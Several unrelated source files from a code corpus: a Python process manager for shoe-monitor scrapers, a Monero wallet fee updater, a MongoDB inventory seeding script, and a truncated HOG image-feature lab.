COMMANDS.MM_GET_SCRAPER_CONFIG
] = self.on_get_scraper_config
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_CONFIG
] = self.on_set_scraper_config
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_WHITELIST
] = self.on_get_scraper_whitelist
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_WHITELIST
] = self.on_set_scraper_whitelist
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_BLACKLIST
] = self.on_get_scraper_blacklist
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_BLACKLIST
] = self.on_set_scraper_blacklist
self.cmd_to_callback[
COMMANDS.MM_GET_SCRAPER_WEBHOOKS
] = self.on_get_scraper_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_SCRAPER_WEBHOOKS
] = self.on_set_scraper_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_BLACKLIST
] = self.on_set_monitor_scraper_blacklist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_WHITELIST
] = self.on_set_monitor_scraper_whitelist
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_WEBHOOKS
] = self.on_set_monitor_scraper_webhooks
self.cmd_to_callback[
COMMANDS.MM_SET_MONITOR_SCRAPER_CONFIG
] = self.on_set_monitor_scraper_configs
self.cmd_to_callback[COMMANDS.MM_GET_SCRAPER_SHOES] = self.on_get_scraper_shoes
self.cmd_to_callback[COMMANDS.MM_GET_MONITOR_SHOES] = self.on_get_monitor_shoes
# initialize variables
self.monitor_processes = {} # type: Dict[str, Dict[str, Any]]
self.scraper_processes = {} # type: Dict[str, Dict[str, Any]]
self.monitor_sockets = {} # type: Dict[str, str]
self.scraper_sockets = {} # type: Dict[str, str]
self.register_db = pymongo.MongoClient(
self.config["GlobalConfig"]["db_path"]
)[ # database where to find class_name -> filename relation
self.config["GlobalConfig"]["db_name"]
][
"register"
]
# let's avoid concurrency problems on socket creation/deletion
self.socket_lock = asyncio.Lock()
# and don't stop on MM_STOP_MONITOR_MANAGER if we are in the loop
self._loop_lock = asyncio.Lock()
# mandatory arguments, needed in the command
self.add_args = ["name"]
self.stop_args = ["name"]
self.getter_args = ["name"]
self.setter_args = ["name", "payload"]
self.shutdown_all_on_exit = True # you might wanna change this
# needed for the crash webhook
tornado.httpclient.AsyncHTTPClient.configure(
"tornado.curl_httpclient.CurlAsyncHTTPClient"
)
self.client = tornado.httpclient.AsyncHTTPClient()
# create main loop task
self.check_status_task = self._asyncio_loop.create_task(self.check_status())
# watches the config folder for any change. calls on_modified when any monitored file is modified
self.watcher = observers.Observer()
self.watcher.schedule(self, self.config["GlobalConfig"]["config_path"], True)
self.watcher.schedule(self, self.config["GlobalConfig"]["socket_path"], True)
# needed for proper shutdown
self.has_to_quit = False
def start(self):
"""Start the Monitor Manager."""
self.watcher.start()
self._asyncio_loop.run_forever()
def on_modified(self, event: FileSystemEvent):
# called when any of the monitored files is modified.
# we are only interested int the configs for now.
filepath = event.key[1] # type: str
if not filepath.endswith(".json"):
return
# if a config file is updated:
if filepath.startswith(self.config["GlobalConfig"]["config_path"]):
if filepath.startswith(
os.path.sep.join((self.config["GlobalConfig"]["config_path"], "common"))
):
asyncio.run_coroutine_threadsafe(
self.update_common_config(filepath), self._asyncio_loop
)
else:
asyncio.run_coroutine_threadsafe(
self.update_specific_config(filepath), self._asyncio_loop
)
def on_created(self, event: FileSystemEvent):
filename = event.key[1] # type: str
# if a socket was created:
if filename.find(self.config["GlobalConfig"]["socket_path"]) != -1:
asyncio.run_coroutine_threadsafe(self.on_add_sockets(), self._asyncio_loop)
def on_deleted(self, event):
filename = event.key[1] # type: str
# if a socket was deleted:
if filename.find(self.config["GlobalConfig"]["socket_path"]) != -1:
asyncio.run_coroutine_threadsafe(
self.on_delete_sockets(), self._asyncio_loop
)
async def on_add_sockets(self):
"""
Routine that updates the internal list of available sockets on add event
"""
async with self.socket_lock:
# get any socket that is not in the list
new_monitor_sockets = {} # type: Dict[str, str]
new_scraper_sockets = {} # type: Dict[str, str]
for filename in os.listdir(self.config["GlobalConfig"]["socket_path"]):
splits = filename.split(".")
if splits[0] == "Monitor" and splits[1] not in self.monitor_sockets:
new_monitor_sockets[splits[1]] = os.path.sep.join(
[self.config["GlobalConfig"]["socket_path"], filename]
)
elif splits[0] == "Scraper" and splits[1] not in self.scraper_sockets:
new_scraper_sockets[splits[1]] = os.path.sep.join(
[self.config["GlobalConfig"]["socket_path"], filename]
)
# check if it's alive
alive_monitor_sockets, alive_scraper_sockets = await asyncio.gather(
self.get_alive_sockets(new_monitor_sockets.values()),
self.get_alive_sockets(new_scraper_sockets.values()),
)
# if it is, add it to the list
for class_name in new_monitor_sockets:
if new_monitor_sockets[class_name] in alive_monitor_sockets:
self.monitor_sockets[class_name] = new_monitor_sockets[class_name]
for class_name in new_scraper_sockets:
if new_scraper_sockets[class_name] in alive_scraper_sockets:
self.scraper_sockets[class_name] = new_scraper_sockets[class_name]
async def on_delete_sockets(self):
"""
Routine that updates the internal list of available sockets on delete event
"""
async with self.socket_lock:
existing_monitor_sockets = []
existing_scraper_sockets = []
# get the current list of existing sockets
for f in list(os.listdir(self.config["GlobalConfig"]["socket_path"])):
if f.startswith("Monitor."):
existing_monitor_sockets.append(f)
elif f.startswith("Scraper."):
existing_scraper_sockets.append(f)
# temp copy
updated_monitor_sockets = copy.copy(self.monitor_sockets)
updated_scraper_sockets = copy.copy(self.scraper_sockets)
# remove every internal socket that is not existing
for class_name in self.monitor_sockets:
if "Monitor." + class_name not in existing_monitor_sockets:
updated_monitor_sockets.pop(class_name)
for class_name in self.scraper_sockets:
if "Scraper." + class_name not in existing_scraper_sockets:
updated_scraper_sockets.pop(class_name)
self.monitor_sockets = updated_monitor_sockets
self.scraper_sockets = updated_scraper_sockets
async def get_alive_sockets(self, sockets: List[str]) -> List[str]:
"""
Ping the provided sockets and return a list of alive sockets
"""
tasks = []
for socket in sockets:
cmd = Cmd()
cmd.cmd = COMMANDS.PING
tasks.append(self.make_request(socket, cmd))
responses = await asyncio.gather(*tasks) # type: List[Response]
alive = []
for response, socket in zip(responses, sockets):
if not response.error.value:
alive.append(socket)
return alive
async def update_common_config(self, filename: str):
"""Reads the provided config file and updates the interested monitors/scrapers"""
self.general_logger.debug(f"File {filename} has changed!")
try:
with open(filename, "r") as f:
j = json.load(f)
except JSONDecodeError:
self.general_logger.warning(
f"File {filename} has changed but contains invalid json data"
)
return
splits = filename.split(os.path.sep)
for sockets in (self.monitor_sockets, self.scraper_sockets):
commands = [] # List[Cmd]
sock_paths = [] # type: List[str]
# we are interested in configs, whitelists, blacklists, webhooks
if splits[-1] == "whitelists.json":
cmd = COMMANDS.SET_COMMON_WHITELIST
elif splits[-1] == "configs.json":
cmd = COMMANDS.SET_COMMON_CONFIG
elif splits[-1] == "blacklists.json":
cmd = COMMANDS.SET_COMMON_BLACKLIST
elif splits[-1] == "webhooks.json":
cmd = COMMANDS.SET_COMMON_WEBHOOKS
else:
return
# for every monitor socket
for name in sockets:
if name in j:
sock_path = sockets[name]
c = Cmd()
c.cmd = cmd
# send only the corresponding part to the monitor
c.payload = j[name]
commands.append(c)
sock_paths.append(sock_path)
# prepare to make all the async requests
tasks = []
for sock_path, command in zip(sock_paths, commands):
tasks.append(self.make_request(sock_path, command))
# send the requests
responses = await asyncio.gather(*tasks) # List[Response]
for response in responses:
if response.error.value:
self.general_logger.warning(
f"Failed to update config: {response.error}"
)
async def update_specific_config(self, filename: str):
"""Reads the provided config file and updates the interested monitors/scrapers"""
self.general_logger.debug(f"File {filename} has changed!")
try:
with open(filename, "r") as f:
j = json.load(f)
except JSONDecodeError:
self.general_logger.warning(
f"File {filename} has changed but contains invalid json data"
)
return
splits = filename.split(os.path.sep)
commands = [] # List[Cmd]
sock_paths = [] # type: List[str]
# if it's from the monitors folder:
if "monitors" in filename.split(os.path.sep):
sockets = self.monitor_sockets
elif "scrapers" in filename.split(os.path.sep):
sockets = self.scraper_sockets
else:
self.general_logger.debug("File not useful.")
return
# we are interested in configs, whitelists, blacklists, webhooks
if splits[-1] == "whitelists.json":
cmd = COMMANDS.SET_SPECIFIC_WHITELIST
elif splits[-1] == "configs.json":
cmd = COMMANDS.SET_SPECIFIC_CONFIG
elif splits[-1] == "blacklists.json":
cmd = COMMANDS.SET_SPECIFIC_BLACKLIST
elif splits[-1] == "webhooks.json":
cmd = COMMANDS.SET_SPECIFIC_WEBHOOKS
else:
return
# for every monitor socket
for name in sockets:
if name in j:
sock_path = sockets[name]
c = Cmd()
c.cmd = cmd
# send only the corresponding part to the monitor
c.payload = j[name]
commands.append(c)
sock_paths.append(sock_path)
# prepare to make all the async requests
tasks = []
for sock_path, command in zip(sock_paths, commands):
tasks.append(self.make_request(sock_path, command))
# send the requests
responses = await asyncio.gather(*tasks) # List[Response]
for response in responses:
if response.error.value:
self.general_logger.warning(
f"Failed to update config: {response.error}"
)
async def on_server_stop(self):
"""
Routine that runs on server stop. Shuts down the monitor manager
"""
async with self._loop_lock:
# stop the config watcher
self.watcher.stop()
self.watcher.join()
if self.shutdown_all_on_exit:
# get all the existing sockets
sockets = [] # type: List[str]
tasks = []
for sockname in os.listdir(self.config["GlobalConfig"]["socket_path"]):
if sockname.startswith("Scraper.") or sockname.startswith(
"Monitor."
):
cmd = Cmd()
cmd.cmd = COMMANDS.STOP
sockets.append(sockname)
self.general_logger.info(f"Stopping {sockname}...")
tasks.append(
self.make_request(
f"{self.config['GlobalConfig']['socket_path']}{os.path.sep}{sockname}",
cmd,
)
)
# send request to stop
responses = await asyncio.gather(*tasks) # type: List[Response]
for sockname, r in zip(sockets, responses):
# if an error happened...
if r.error.value:
# if the socket was not used remove it
if r.error == ERRORS.SOCKET_COULDNT_CONNECT:
os.remove(
os.path.sep.join(
[
self.config["GlobalConfig"]["socket_path"],
sockname,
]
)
)
self.general_logger.info(
f"{self.config['GlobalConfig']['socket_path']}{os.path.sep}{sockname} was removed because unavailable"
)
# else something else happened, dont do anything
else:
self.general_logger.warning(
f"Error occurred while attempting to stop {sockname}: {r.error}"
)
# ok
else:
self.general_logger.info(f"{sockname} was successfully stopped")
self._asyncio_loop.stop()
self.general_logger.info("Shutting down...")
return okResponse()
async def check_status(self):
"""Main MonitorManager loop. Every second it checks its monitored processes and looks if they are still alive, possibly reporting any exit code"""
while True:
async with self._loop_lock:
new_monitor_processes = {}
for class_name in self.monitor_processes:
monitor = self.monitor_processes[class_name]["process"]
if monitor.poll() is not None:
log = f"Monitor {class_name} has stopped with code: {monitor.returncode}"
if monitor.returncode:
self.general_logger.warning(log)
if self.config["WebhookConfig"]["crash_webhook"]:
embed = get_mm_crash_embed(
"Monitor " + class_name,
monitor.returncode,
monitor.pid,
)
ts = datetime.now().strftime(
self.config["WebhookConfig"]["timestamp_format"]
)
embed.set_footer(
text=f"{self.config['WebhookConfig']['provider']} | {ts}",
icon_url=self.config["WebhookConfig"][
"provider_icon"
],
)
data = json.dumps(
{
"embeds": [embed.to_dict()],
"username": "MonitorManager process watcher",
"avatar_url": self.config["WebhookConfig"][
"provider_icon"
],
}
)
r = await self.client.fetch(
self.config["WebhookConfig"]["crash_webhook"],
method="POST",
body=data,
headers={"content-type": "application/json"},
raise_error=False,
)
else:
self.general_logger.info(log)
else:
new_monitor_processes[class_name] = self.monitor_processes[
class_name
]
self.monitor_processes = new_monitor_processes
new_scraper_processes = {}
for class_name in self.scraper_processes:
scraper = self.scraper_processes[class_name]["process"]
if scraper.poll() is not None:
log = f"Scraper {class_name} has stopped with code: {scraper.returncode}"
if scraper.returncode:
self.general_logger.warning(log)
if self.config["WebhookConfig"]["crash_webhook"]:
embed = get_mm_crash_embed(
"Scraper " + class_name,
scraper.returncode,
scraper.pid,
)
ts = datetime.now().strftime(
self.config["WebhookConfig"]["timestamp_format"]
)
embed.set_footer(
text=f"{self.config['WebhookConfig']['provider']} | {ts}",
icon_url=self.config["WebhookConfig"][
"provider_icon"
],
)
data = json.dumps(
{
"embeds": [embed.to_dict()],
"username": "MonitorManager process watcher",
"avatar_url": self.config["WebhookConfig"][
"provider_icon"
],
}
)
r = await self.client.fetch(
self.config["WebhookConfig"]["crash_webhook"],
method="POST",
body=data,
headers={"content-type": "application/json"},
raise_error=False,
)
else:
self.general_logger.info(log)
else:
new_scraper_processes[class_name] = self.scraper_processes[
class_name
]
self.scraper_processes = new_scraper_processes
await asyncio.sleep(1)
async def on_add_monitor(self, cmd: Cmd) -> Response:
r = badResponse()
success, missing = cmd.has_valid_args(self.add_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
db_monitor = self.register_db["monitors"].find_one(
{"name": payload["name"]}
)
if db_monitor:
success, reason = await self.add_monitor(db_monitor["path"], payload)
if success:
r = okResponse()
else:
r.error = ERRORS.MM_COULDNT_ADD_MONITOR
r.info = reason
else:
r.error = ERRORS.MONITOR_NOT_REGISTERED
r.info = f"Tried to add monitor {payload['name']} but it was not found in the db. Did you start it at least once manually?"
else:
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"Missing arguments: {missing}"
return r
async def on_add_scraper(self, cmd: Cmd) -> Response:
r = badResponse()
success, missing = cmd.has_valid_args(self.add_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
db_scraper = self.register_db["scrapers"].find_one(
{"name": payload["name"]}
)
if db_scraper:
success, reason = await self.add_scraper(db_scraper["path"], payload)
if success:
r = okResponse()
else:
r.error = ERRORS.MM_COULDNT_ADD_SCRAPER
r.info = reason
else:
r.error = ERRORS.SCRAPER_NOT_REGISTERED
r.info = f"Tried to add scraper {payload['name']} but it was not found in the db. Did you start it at least once manually?"
else:
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"Missing arguments: {missing}"
return r
async def on_add_monitor_scraper(self, cmd: Cmd) -> Response:
r = Response()
cmd1 = cmd
cmd2 = copy.copy(cmd)
cmd2.payload = copy.deepcopy(cmd1.payload)
r1, r2 = await asyncio.gather(
self.on_add_monitor(cmd1), self.on_add_scraper(cmd2)
)
r.error = (
ERRORS.OK
if not r1.error.value and not r2.error.value
else ERRORS.MM_COULDNT_ADD_MONITOR_SCRAPER
)
r.info = f"Monitor: {r1.error.name}, Scraper: {r2.error.name}"
if r.error.value and r.error:
self.general_logger.warning(f"Couldn't add monitor and scraper")
kekmonitors.utils.tools.dump_error(self.general_logger, r)
return r
async def on_stop_monitor(self, cmd: Cmd) -> Response:
r = badResponse()
success, missing = cmd.has_valid_args(self.stop_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
socket = f"{self.config['GlobalConfig']['socket_path']}/Monitor.{payload['name']}"
command = Cmd()
command.cmd = COMMANDS.STOP
self.general_logger.debug(f"Sending STOP to {socket}...")
r = await self.make_request(socket, command)
self.general_logger.debug(f"Sent STOP to {socket}")
else:
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"Missing arguments: {missing}"
return r
async def on_stop_scraper(self, cmd: Cmd) -> Response:
r = badResponse()
success, missing = cmd.has_valid_args(self.stop_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
socket = f"{self.config['GlobalConfig']['socket_path']}/Scraper.{payload['name']}"
command = Cmd()
command.cmd = COMMANDS.STOP
self.general_logger.debug(f"Sending STOP to {socket}...")
r = await self.make_request(socket, command)
self.general_logger.debug(f"Sent STOP to {socket}")
else:
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"Missing arguments: {missing}"
return r
async def on_stop_monitor_scraper(self, cmd: Cmd) -> Response:
r = badResponse()
success, missing = cmd.has_valid_args(self.stop_args)
if success:
r1, r2 = await asyncio.gather(
self.on_stop_monitor(cmd), self.on_stop_scraper(cmd)
)
r.error = (
ERRORS.OK
if not r1.error.value and not r2.error.value
else ERRORS.MM_COULDNT_STOP_MONITOR_SCRAPER
)
r.info = f"Monitor: {r1.error.name}, Scraper: {r2.error.name}"
if r.error.value and r.error:
self.general_logger.warning(f"Couldn't stop monitor and scraper")
kekmonitors.utils.tools.dump_error(self.general_logger, r)
else:
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"Missing arguments: {missing}"
return r
async def on_get_monitor_status(self, cmd: Cmd) -> Response:
process_status = {}
for class_name in self.monitor_processes:
start = self.monitor_processes[class_name]["start"].strftime(
"%m/%d/%Y, %H:%M:%S"
)
process_status[class_name] = {
"Started at": start,
"PID": self.monitor_processes[class_name]["process"].pid,
}
sockets_status = {}
# for class_name in self.monitor_sockets:
# sockets_status[class_name] = {class_name: self.monitor_sockets[class_name]}
sockets_status = self.monitor_sockets
response = okResponse()
response.payload = {
"monitored_processes": process_status,
"available_sockets": sockets_status,
}
return response
async def on_get_scraper_status(self, cmd: Cmd) -> Response:
process_status = {}
for class_name in self.scraper_processes:
start = self.scraper_processes[class_name]["start"].strftime(
"%m/%d/%Y, %H:%M:%S"
)
process_status[class_name] = {
"Started at": start,
"PID": self.scraper_processes[class_name]["process"].pid,
}
sockets_status = {}
# for class_name in self.scraper_sockets:
# sockets_status[class_name] = {class_name: self.scraper_sockets[class_name]}
sockets_status = self.scraper_sockets
response = okResponse()
response.payload = {
"monitored_processes": process_status,
"available_sockets": sockets_status,
}
return response
async def on_get_status(self, cmd: Cmd) -> Response:
ms = await self.on_get_monitor_status(cmd)
ss = await self.on_get_scraper_status(cmd)
response = okResponse()
msp = cast(Dict[str, Any], ms.payload) # type: Dict[str, Any]
ssp = cast(Dict[str, Any], ss.payload) # type: Dict[str, Any]
response.payload = {"monitors": msp, "scrapers": ssp}
return response
async def add_monitor(self, filename: str, kwargs: Dict[str, str]):
class_name = kwargs.pop("name")
if class_name in self.monitor_processes:
self.general_logger.debug(
f"Tried to add an already existing monitor ({class_name} ({filename}))"
)
return False, "Monitor already started."
first_part_cmd = (
f"nohup {sys.executable} {filename} --no-output --no-config-watcher"
)
args = []
for key in kwargs:
args.append(f"--{key} {kwargs[key]}")
cmd = " ".join((first_part_cmd, *args))
self.general_logger.debug(f"Starting {class_name} ({filename})...")
monitor = subprocess.Popen(
shlex.split(cmd), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
await asyncio.sleep(2) # wait to check if process is still alive
if monitor.poll() is not None:
success = False
msg = f"Failed to start monitor {class_name} ({filename})"
self.general_logger.warning(
f"Tried to start {class_name} ({filename}) but failed"
)
else:
self.general_logger.info(
f"Added monitor {class_name} with pid {monitor.pid}"
)
self.monitor_processes[class_name] = {
"process": monitor,
"start": datetime.now(),
}
success = True
msg = ""
return success, msg
async def add_scraper(self, filename: str, kwargs: Dict[str, str]):
class_name = kwargs.pop("name")
if class_name in self.scraper_processes:
self.general_logger.debug(
f"Tried to add an already existing scraper ({class_name} ({filename}))"
)
return False, "Scraper already started."
first_part_cmd = (
f"nohup {sys.executable} {filename} --no-output --no-config-watcher"
)
args = []
for key in kwargs:
args.append(f"--{key} {kwargs[key]}")
cmd = " ".join((first_part_cmd, " ".join(args)))
self.general_logger.debug(f"Starting {class_name} ({filename})...")
scraper = subprocess.Popen(
shlex.split(cmd), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
await asyncio.sleep(2) # wait to check if process is still alive
if scraper.poll() is not None:
success = False
msg = f"Failed to start scraper {class_name} ({filename})"
self.general_logger.warning(
f"Tried to start {class_name} ({filename}) but failed"
)
else:
self.general_logger.info(
f"Added scraper {class_name} with pid {scraper.pid}"
)
self.scraper_processes[class_name] = {
"process": scraper,
"start": datetime.now(),
}
success = True
msg = ""
return success, msg
async def on_get_monitor_config(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_CONFIG, True)
async def on_set_monitor_config(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "configs.json", True)
async def on_get_monitor_whitelist(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_WHITELIST, True)
async def on_set_monitor_whitelist(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "whitelists.json", True)
async def on_get_monitor_blacklist(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_BLACKLIST, True)
async def on_set_monitor_blacklist(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "blacklists.json", True)
async def on_get_monitor_webhooks(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_WEBHOOKS, True)
async def on_set_monitor_webhooks(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "webhooks.json", True)
async def on_get_scraper_config(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_CONFIG, False)
async def on_set_scraper_config(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "configs.json", False)
async def on_get_scraper_whitelist(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_WHITELIST, False)
async def on_set_scraper_whitelist(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "whitelists.json", False)
async def on_get_scraper_blacklist(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_BLACKLIST, False)
async def on_set_scraper_blacklist(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "blacklists.json", False)
async def on_get_scraper_webhooks(self, cmd: Cmd) -> Response:
return await self.specific_config_getter(cmd, COMMANDS.GET_WEBHOOKS, False)
async def on_set_scraper_webhooks(self, cmd: Cmd) -> Response:
return await self.specific_config_setter(cmd, "webhooks.json", False)
async def on_set_monitor_scraper_blacklist(self, cmd: Cmd) -> Response:
return await self.common_config_setter(cmd, "blacklists.json")
async def on_set_monitor_scraper_whitelist(self, cmd: Cmd) -> Response:
return await self.common_config_setter(cmd, "whitelists.json")
async def on_set_monitor_scraper_webhooks(self, cmd: Cmd) -> Response:
return await self.common_config_setter(cmd, "webhooks.json")
async def on_set_monitor_scraper_configs(self, cmd: Cmd) -> Response:
return await self.common_config_setter(cmd, "configs.json")
async def specific_config_getter(
self, cmd: Cmd, command: COMMANDS, is_monitor: bool
):
success, missing = cmd.has_valid_args(self.getter_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
c = Cmd()
c.cmd = command
r = await self.make_request(
f"{self.config['GlobalConfig']['socket_path']}/{'Monitor' if is_monitor else 'Scraper'}.{payload['name']}",
c,
)
return r
else:
r = badResponse()
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"{missing}"
return r
async def specific_config_setter(self, cmd: Cmd, filename: str, is_monitor: bool):
success, missing = cmd.has_valid_args(self.setter_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
cp = os.path.sep.join(
(
self.config["GlobalConfig"]["config_path"],
"monitors" if is_monitor else "scrapers",
filename,
)
)
with open(
cp,
"r",
) as rf:
f = json.load(rf)
f[payload["name"]] = payload["payload"]
with open(
cp,
"w",
) as wf:
json.dump(f, wf)
else:
r = badResponse()
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"{missing}"
return r
async def common_config_setter(self, cmd: Cmd, filename: str):
success, missing = cmd.has_valid_args(self.setter_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
cp = os.path.sep.join(
(self.config["GlobalConfig"]["config_path"], "common", filename)
)
with open(
cp,
"r",
) as rf:
f = json.load(rf)
f[payload["name"]] = payload["payload"]
with open(
cp,
"w",
) as wf:
json.dump(f, wf)
else:
r = badResponse()
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"{missing}"
return r
async def on_get_scraper_shoes(self, cmd: Cmd) -> Response:
success, missing = cmd.has_valid_args(self.getter_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
c = Cmd()
c.cmd = COMMANDS.GET_SHOES
r = await self.make_request(
f"{self.config['GlobalConfig']['socket_path']}/Monitor.{payload['name']}",
c,
)
return r
else:
r = badResponse()
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"{missing}"
return r
async def on_get_monitor_shoes(self, cmd: Cmd) -> Response:
success, missing = cmd.has_valid_args(self.getter_args)
if success:
payload = cast(Dict[str, Any], cmd.payload)
c = Cmd()
c.cmd = COMMANDS.SET_SHOES
r = await self.make_request(
f"{self.config['GlobalConfig']['socket_path']}/Monitor.{payload['name']}",
c,
)
return r
else:
r = badResponse()
r.error = ERRORS.MISSING_PAYLOAD_ARGS
r.info = f"{missing}"
return r
if __name__ == "__main__":
MonitorManager().start()
| berton7/kek-monitors | kekmonitors/monitor_manager.py | monitor_manager.py | py | 41,901 | python | en | code | 8 | github-code | 1 | [
{
"api_name": "sys.version_info",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "os.path",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "kekmonitors.comms.server.Server",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "wa... |
42604295575 | from app import db
from app.models import \
MoneroTransactions, MoneroWalletFee
from app.generalfunctions import floating_decimals
from sqlalchemy import func
def getlastestfee():
"""
THis will query the last 10 withdrawls...get the average fee
:return:
"""
getratings = db.session.query(func.avg(MoneroTransactions.fee))
getratings = getratings.filter(MoneroTransactions.category == 2)
getratings = getratings.order_by(MoneroTransactions.created.desc())
avgrate = getratings.limit(10)
x = (avgrate[0][0])
y = floating_decimals(x, 8)
thefee = db.session.query(MoneroWalletFee).filter_by(id=1).first()
thefee.amount = y
db.session.add(thefee)
db.session.commit()
getlastestfee() | CRYPTOFOUNDARY/wallet_monero | monero_getlastestfee.py | monero_getlastestfee.py | py | 742 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "app.db.session.query",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "app.db.session",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "app.db",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.avg",... |
15933889767 | import pymongo
from pymongo import MongoClient
cluster = MongoClient("mongodb://localhost:27017")
database = cluster["Storage"]
collection = database["Inventory"]
deletingManyDate = collection.delete_many({})
post = {"_id": 0,
"quantity": 400,
"productId": 0,
"productName": "Soap",
"price": 200,
"category": "Personal Protective Equipment (PPE)",
"vendor": "Vendor1",
"added_count": 20}
post1 = {"_id": 1,
"quantity": 400,
"productId": 1,
"productName": "Brush",
"price": 400,
"category": "Surgical Supplies",
"vendor": "Vendor2",
"added_count": 10}
post2 = {"_id": 2,
"quantity": 800,
"productId": 2,
"productName": "Mask",
"price": 10,
"category": "Laboratory Supplies",
"vendor": "Vendor1",
"added_count": 15}
post3 = {"_id": 3,
"quantity": 100,
"productId": 3,
"productName": "Sanitizers",
"price": 300,
"category": "Sterile instruments",
"vendor": "Vendor2",
"added_count": 2}
post4 = {"_id": 4,
"quantity": 100,
"productId": 4,
"productName": "Sanitizers",
"price": 300,
"category": "Pharmaceuticals",
"vendor": "Vendor1",
"added_count": 1}
post5 = {"_id": 5,
"quantity": 50,
"productId": 5,
"productName": "Condoms",
"price": 2.99,
"category": "Diagnostic Equipment",
"vendor": "Vendor2",
"added_count": 6}
post6 = {"_id": 6,
"quantity": 20,
"productId": 6,
"productName": "Medicines",
"price": 10,
"category": "Wound Care Supplies",
"vendor": "Vendor1",
"added_count": 7}
post7 = {"_id": 7,
"quantity": 20,
"productId": 7,
"productName": "Mac",
"price": 20,
"category": "Laboratory Supplies",
"vendor": "Vendor1",
"added_count": 8}
# Inserting multiple lines
collection.insert_many([post1, post2, post3, post4, post5, post6, post7])
sorted_cursor = collection.find().sort('productName', 1)
sorted_docs = []
for doc in sorted_cursor:
sorted_docs.append(doc)
collection.delete_many({})
collection.insert_many(sorted_docs)
| Nirusan03/FYP_Abi | mongodb.py | mongodb.py | py | 2,346 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 4,
"usage_type": "call"
}
] |
35718269403 | # -*- coding: utf-8 -*-
"""
Course: CS 4365/5354 [Computer Vision]
Author: Jose Perez [ID: 80473954]
Assignment: Lab 2
Instructor: Olac Fuentes
"""
from timeit import default_timer as timer
import numpy as np
from scipy import signal
# ========================= Constants =========================
# Matrix used for convolution of the HOGs
convolution_matrix = np.array([[-1, 0, 1]])
def integral_sums_image(im, region, number_of_bars=12):
# Initialize using the first color channel
imx = np.zeros(im[:,:,0].shape)
imx = signal.convolve(im[:,:,0], convolution_matrix, mode='same')
imy = np.zeros(im[:,:,0].shape)
imy = signal.convolve(im[:,:,0], np.transpose(convolution_matrix), mode='same')
magnitude = np.sqrt(imx**2+imy**2)
direction = (np.arctan2(imy, imx) * 180 / np.pi) + 180 # From 0 to 360
# Go through the other color channels
# Get the maximum magnitude for each
for i in range(1, 3):
imx = np.zeros(im[:,:,i].shape)
imx = signal.convolve(im[:,:,i], convolution_matrix, mode='same')
imy = np.zeros(im[:,:,i].shape)
imy = signal.convolve(im[:,:,i], np.transpose(convolution_matrix), mode='same')
curr_magnitude = np.sqrt(imx**2+imy**2)
curr_direction = (np.arctan2(imy, imx) * 180 / np.pi) + 180 # From 0 to 360
magnitude = np.maximum(magnitude, curr_magnitude)
direction = np.maximum(direction, curr_direction)
#print "[Integral HOG] Finished getting magnitude and direction"
start_time = timer()
angle_step = 360 / number_of_bars
angle_range = xrange(0, 360, angle_step)
(w, h) = region.shape[:2]
(row, column) = im.shape[:2]
row += 1
column += 1
integral_sums = np.zeros((12, row-h, column-w ), dtype=np.float64)
i = 0
#print "[Integral HOG] Starting calculation of sums"
for angle in angle_range:
integral = magnitude.copy().astype(np.float64)
# Set the magnitude for all other angles to 0
integral[np.logical_or(direction<angle, direction>=angle+30)] = 0
integral = integral.cumsum(1).cumsum(0)
integral = np.pad(integral, (1, 0), 'constant', constant_values=(0))
A = integral[0:row-h, 0:column-w]
